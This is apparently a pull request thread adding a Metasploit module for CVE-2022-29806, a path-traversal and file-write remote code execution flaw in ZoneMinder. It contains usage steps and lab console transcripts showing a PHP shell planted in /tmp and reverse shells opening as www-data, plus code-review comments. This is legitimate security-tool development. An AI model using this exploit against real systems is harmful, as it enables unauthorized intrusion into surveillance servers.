Add Zoneminder lang exec module

[krastanoel]

This module exploits arbitrary file write in debug log file option chained with a path traversal in language settings that leads to a remote code execution in ZoneMinder surveillance software versions before 1.36.13 and before 1.37.11.

More vulnerability details and references: CVE-2022-29806

Meterpreter

Upon successful exploitation the module will change the language back to en_gb to prevent a PHP warning shows in the dashboard like this:

View: request Request: log Action: User: admin] at /usr/share/zoneminder/www/index.php line 235 04/28/22 15:03:50.516723 web_js[550].ERR [172.17.0.1] [
Warning: Use of undefined constant [snip-base64-long-string-payload] - assumed '[snip-base64-string-payload] in /tmp/8NMNy9sqV.php on line 10

The warning is a lot and will be notice by users using the dashboard so it's good to change it back to its default. However, using php/meterpreter_reverse_tcp will even made the dashboard stop working, it's like the part of the code that suppose to change the language back is not executing when using meterpreter. The module will configured php/reverse_perl as the default payload for good reliability.

Verification

List the steps needed to make sure this thing works

• Start msfconsole
• use exploit/unix/webapp/zoneminder_lang_exec
• set RHOSTS [ips]
• set LHOST [lhost]
• set VERBOSE true
• run
• Verify the module should get a shell.

Demo

ZoneMinder 1.36.4 on Linux (Ubuntu 18.04 Docker Image)

msf6 > use exploit/unix/webapp/zoneminder_lang_exec
[*] Using configured payload php/reverse_perl
msf6 exploit(unix/webapp/zoneminder_lang_exec) > set RHOSTS 172.17.0.2
RHOSTS => 172.17.0.2
msf6 exploit(unix/webapp/zoneminder_lang_exec) > set LHOST 172.17.0.1
LHOST => 172.17.0.1
msf6 exploit(unix/webapp/zoneminder_lang_exec) > set VERBOSE true
VERBOSE => true
msf6 exploit(unix/webapp/zoneminder_lang_exec) > run

[*] Started reverse TCP handler on 172.17.0.1:4444
[+] Version Detected: 1.36.4
[*] Leak installation directory path
[+] Path: /usr/share/zoneminder/www
[+] Shell: ../../../../../tmp/n4Ibantd.php
[*] Command shell session 1 opened (172.17.0.1:4444 -> 172.17.0.2:36390) at 2022-04-28 21:39:56 +0700

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

[bcoles]

I took a quick look over the module code. A few observations.

fail_with should not be used within the check method. If the connection fails, the usual approach is to return CheckCode::Unknown or CheckCode::Safe.

This code pattern is used a few times in the check method:

        if res.body =~ %r{<title>ZM - Login</title>}
          vprint_error('Service found, but authentication failed')
          return Exploit::CheckCode::Detected
        else

Rather than print then return a checkcode, you can return both at once:

return CheckCode::Detected('Service found, but authentication failed')

Also else is redundant after return.

The exploit method returns CheckCode in a few instances. It should instead use fail_with.

rand_text_alphanumeric supports a range. Rather than use rand you can do this: rand_text_alphanumeric(6..15)

Is it possible to get the current language before resetting it, rather than presume it was en_gb ?

[krastanoel]

Hello @bcoles
Thanks for the observations, I have made a few changes accordingly.

Is it possible to get the current language before resetting it, rather than presume it was en_gb ?

Yes it is possible, I just learned get_html_document method today and have used it to get the current language.

[jmartin-tech]

Thanks for the contribution!

Made a couple minor comments for review.

[space-r7]

Hey @krastanoel, thanks for the module! I just left a few small notes mostly about using the cookie jar and checking responses.

[space-r7]

Version 1.32.3 without auth

msf6 > use exploit/unix/webapp/zoneminder_lang_exec
[*] Using configured payload php/reverse_perl
msf6 exploit(unix/webapp/zoneminder_lang_exec) > set rhost 192.168.140.154
rhost => 192.168.140.154
msf6 exploit(unix/webapp/zoneminder_lang_exec) > set lhost 192.168.140.1
lhost => 192.168.140.1
msf6 exploit(unix/webapp/zoneminder_lang_exec) > run

[*] Started reverse TCP handler on 192.168.140.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version Detected: 1.32.3
[*] Command shell session 1 opened (192.168.140.1:4444 -> 192.168.140.154:47700 ) at 2022-05-04 17:20:39 -0500

uname -a
Linux ubuntu 5.13.0-40-generic #45~20.04.1-Ubuntu SMP Mon Apr 4 09:38:31 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
^C
Abort session 1? [y/N]  y

Version 1.32.3 with authentication

msf6 exploit(unix/webapp/zoneminder_lang_exec) > set username admin
username => admin
msf6 exploit(unix/webapp/zoneminder_lang_exec) > set password Strongpass
password => Strongpass
msf6 exploit(unix/webapp/zoneminder_lang_exec) > set verbose true
verbose => true
msf6 exploit(unix/webapp/zoneminder_lang_exec) > run

[*] Started reverse TCP handler on 192.168.140.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version Detected: 1.32.3
[*] Leak installation directory path
[+] Path: /usr/share/zoneminder/www
[+] Shell: ../../../../../tmp/wu4ap43AH8F.php
[!] Unable to reset language to default
[*] Command shell session 3 opened (192.168.140.1:4444 -> 192.168.140.154:47704 ) at 2022-05-04 17:25:49 -0500

uname -a
Linux ubuntu 5.13.0-40-generic #45~20.04.1-Ubuntu SMP Mon Apr 4 09:38:31 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

[space-r7]

Made some small changes in dd0b124, just fixing a typo and adding some checks on a few responses.

[space-r7]

Release Notes

This leverages a directory traversal and arbitrary file write in vulnerable versions of ZoneMinder to achieve remote code execution as the www-data user.